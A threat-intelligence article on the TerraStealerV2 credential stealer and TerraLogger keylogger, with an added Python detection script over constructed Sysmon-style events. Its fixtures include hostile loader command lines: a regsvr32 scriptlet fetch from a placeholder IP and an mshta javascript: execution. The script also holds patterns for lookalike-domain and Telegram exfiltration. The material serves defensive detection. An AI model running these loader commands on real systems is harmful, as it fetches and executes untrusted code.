Golden Chickens, a financially motivated threat actor group also tracked as Venom Spider and active since at least 2018, has added two new malware families to its toolset: TerraStealerV2 and TerraLogger. Both are continued development of the group's malware-as-a-service (MaaS) offering. TerraStealerV2 collects sensitive information such as browser credentials, cryptocurrency wallet data, and browser extension details. TerraLogger is a standalone keylogger that records keystrokes and writes them to local log files. Together they show the group's effort to diversify and refine its arsenal.
Both families have been observed in several delivery formats: executables (EXE), dynamic-link libraries (DLL), and Windows Installer packages (MSI). TerraStealerV2 targets Chrome's 'Login Data' SQLite database to harvest saved credentials, but it does not bypass Chrome's newer App-Bound Encryption (ABE). ABE, which Chrome began rolling out on Windows in mid-2024, binds the key protecting saved secrets to Chrome's own identity (decryption goes through a privileged service that checks the calling process), so a DPAPI call in the user's context is no longer enough; credentials saved under ABE stay out of the stealer's reach, which suggests the malware is still under development. Captured data is exfiltrated via Telegram and via the domain "wetransfers[.]io", a lookalike of the legitimate WeTransfer file-sharing service. The malware also executes its payloads through trusted, signed Windows utilities such as regsvr32.exe and mshta.exe, a living-off-the-land technique that blends in with normal system activity and sidesteps controls that only block unsigned binaries.
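The tradecraft in the paragraph above (regsvr32.exe and mshta.exe used as loaders, a lookalike exfiltration domain, and Telegram contact from an unusual process) lends itself to a few simple detection rules. The following is an added example, not code from the original article or from Recorded Future's reporting: it assumes a Sysmon-style shape for process-creation and DNS-query records, the records themselves are constructed, and the heuristics (the argument patterns, the "user-writable path" test, and the one-edit typosquat check against wetransfer.com) are the author's own choices rather than published indicators.

```python
"""Added example: detection heuristics for regsvr32/mshta abuse, a lookalike
exfiltration domain, and Telegram contact from a user-writable path, run over
constructed Sysmon-style records (not real telemetry)."""
import re
from dataclasses import dataclass

# Constructed sample telemetry in a Sysmon-like shape (process creation and
# DNS query events). None of these records is captured data.
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r'regsvr32.exe /s "C:\Program Files\Vendor\plugin.dll"'},
    {"type": "process", "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32.exe /s /n /u /i:https://203.0.113.10/u.sct scrobj.dll"},
    {"type": "process", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r'mshta.exe "C:\Users\alice\AppData\Local\Temp\loader.hta"'},
    {"type": "process", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe javascript:close(new ActiveXObject('WScript.Shell').Run('calc'))"},
    {"type": "dns", "image": r"C:\Users\alice\AppData\Local\Temp\stage2.exe",
     "query": "wetransfers.io"},
    {"type": "dns", "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "query": "wetransfer.com"},
    {"type": "dns", "image": r"C:\Users\alice\AppData\Local\Temp\stage2.exe",
     "query": "api.telegram.org"},
]

# Arguments that turn regsvr32/mshta into a remote loader: URLs, UNC paths,
# script: protocol handlers, or the scriptlet COM server (scrobj.dll).
REMOTE_OR_SCRIPT = re.compile(r"(https?://|\\\\|javascript:|vbscript:|scrobj\.dll)", re.I)
# Paths a standard user can write to; legitimate installers rarely stage HTAs there.
USER_WRITABLE = re.compile(r"(^C:\\Users\\|^C:\\ProgramData\\|\\Temp\\)", re.I)
LEGIT_SHARING_DOMAIN = "wetransfer.com"  # the service that wetransfers[.]io imitates


@dataclass
class Finding:
    rule: str
    detail: str


def levenshtein(a: str, b: str) -> int:
    """Plain edit distance; used to spot typosquats of a known domain."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def registrable(domain: str) -> tuple[str, str]:
    """Naive (label, tld) split; adequate for single-level TLDs like .io/.com."""
    parts = domain.lower().rstrip(".").split(".")
    return (parts[-2], parts[-1]) if len(parts) >= 2 else (parts[0], "")


def is_lookalike(query: str, legit: str) -> bool:
    """True when the registered label is within one edit of the legitimate
    domain's label (or only the TLD differs) but the domain is not the real one."""
    q, l = registrable(query), registrable(legit)
    return q != l and levenshtein(q[0], l[0]) <= 1


def detect(events: list[dict]) -> list[Finding]:
    findings = []
    for ev in events:
        exe = ev["image"].rsplit("\\", 1)[-1].lower()
        if ev["type"] == "process":
            cmd = ev["cmdline"]
            if exe == "regsvr32.exe" and REMOTE_OR_SCRIPT.search(cmd):
                findings.append(Finding("regsvr32_remote_scriptlet", cmd))
            elif exe == "mshta.exe" and (REMOTE_OR_SCRIPT.search(cmd) or USER_WRITABLE.search(cmd)):
                findings.append(Finding("mshta_suspicious", cmd))
        elif ev["type"] == "dns":
            q = ev["query"]
            if is_lookalike(q, LEGIT_SHARING_DOMAIN):
                findings.append(Finding("lookalike_domain", f"{exe} -> {q}"))
            elif q.endswith("telegram.org") and USER_WRITABLE.search(ev["image"]):
                findings.append(Finding("telegram_from_user_path", f"{ev['image']} -> {q}"))
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"{f.rule:26} {f.detail}")
```

Running it flags the regsvr32 scriptlet load, both mshta invocations, the wetransfers.io lookup and the Telegram lookup from a Temp-resident binary, while leaving the silent local DLL registration and Chrome's lookup of the real wetransfer.com alone. The Telegram rule is deliberately narrow (process path rather than the domain alone) because legitimate Telegram clients and bots talk to api.telegram.org constantly; tune the path test to your environment.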
TerraLogger is delivered in the same formats as TerraStealerV2 but serves a different purpose: it records keystrokes to local files. It has no data exfiltration or command-and-control capability of its own, which suggests it is either a work in progress or intended to run alongside other tools in the Golden Chickens MaaS ecosystem that handle collection and upload. Despite its potential for abuse, TerraLogger is the less mature of the two families, and its appearance further widens the range of tools the group offers to cybercriminal operations.
According to Recorded Future, both TerraStealerV2 and TerraLogger are still under active development. Golden Chickens has historically focused on credential theft and gaining unauthorized access, and its tools continue to evolve alongside newly emerging stealer families such as Hannibal Stealer and Gremlin Stealer. These developments fit an ongoing trend in the cybercriminal underground toward more targeted malware built to steal sensitive information and evade security controls.